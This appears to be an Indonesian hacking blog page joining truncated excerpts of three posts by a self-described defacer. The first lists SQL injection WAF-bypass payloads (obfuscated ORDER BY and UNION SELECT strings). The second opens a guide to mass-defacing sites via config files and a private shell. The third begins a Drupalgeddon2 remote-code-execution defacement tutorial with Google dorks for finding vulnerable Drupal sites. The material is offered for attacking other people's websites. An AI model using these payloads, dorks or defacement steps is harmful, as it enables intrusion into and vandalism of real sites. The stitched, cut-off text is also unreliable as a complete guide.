1 in 3 Red Creator

Pada postingan kali ini w mau sharing artikel tentang Maca-macam Bypass WAF pada suatu Sql Injection. Dalam dunia injector kita tidak asing lagi dengan istilah WAF. Apaan sih  WAF  itu? WAF adalah kepanjangan dari (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum. Jadi rata-rata web yang udah di pasang waf itu kebal sama  SQL Injection  yang basic atau sql injection dengan statement error (  '  ) atau (  /**  ) Untuk itu gw akan sedikit berbagi tentang jenis-jenis waf yang biasa di gunakan dalam dunia injector. Dan berikut ini macam-macam bypass waf, order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/ union select /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLe

ok balik lagi dengan gw EssesCyber7  aka ErrOr SplOit  kali ini gw mau ngasih totorial Cara deface web dengan config Menurut ane kalau mau deface banyak itu gak usah pake com_user / com_fabrik dsb karena memakan waktu yang lama untuk mencari target.  Cukup dengan config dengan sedikit tambahan private shell anda bisa mendapat puluhan bahkan ratusan web sekaligus yang sejaringan IP. Ok, sekarang langsung saja ke Tahapan-Tahapan deface dengan metode ini. Warning! Anda boleh copy-paste artikel di blog ini, asalkan mencantumkan link pembuat artikel ini. Hargailah karya orang lain jika anda ingin dihargai! * Bantu saya untuk mengembangkan blog ini menjadi lebih baik dengan mengklik Google Adsense atau Iklan yang ada di atas posting, dibawah posting, dan atau disebelah kiri atas posting. 1 klik sangat berharga bagi saya dan bernilai $0.01 - $1 per kliknya. Yang anda butuhkan: 1. Web Config     [+]  Cara mencari web config disuatu web 2. Mysql Interface     [+]  Adminer     [+] 

ok kembali lagi dengan saya EssesCyber7 awokawok kali ini gw akan membawakan tutorial deface debgan metode Drupal Rce. ok langsung saja ganz Remote Code Execution adalah sama seperti arbitary code execution, dimana membuat attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, bedanya dengan Remote Code Execution adalah sang attacker melakukan injeksi coding melalui dengan mesin yang berbeda, maksudnya dilakukan secara remote terhadap mesin target. Bahan Yang Dibutuhkan : Tools Drupalgeddon2 Linux / Termux Shell Backdoor Dork : inurl:"/user/register" "Powered by Drupal" -CAPTCHA -"Access denied" inurl:"user/register?element_parents=account/mail"  inurl:"*drupal_ajax" kembangin lagi dork nya dengan otak bokep lu:) harus kalian lakukan pertama kali adalah buka tools nya terlebih dahulu di termux atau linu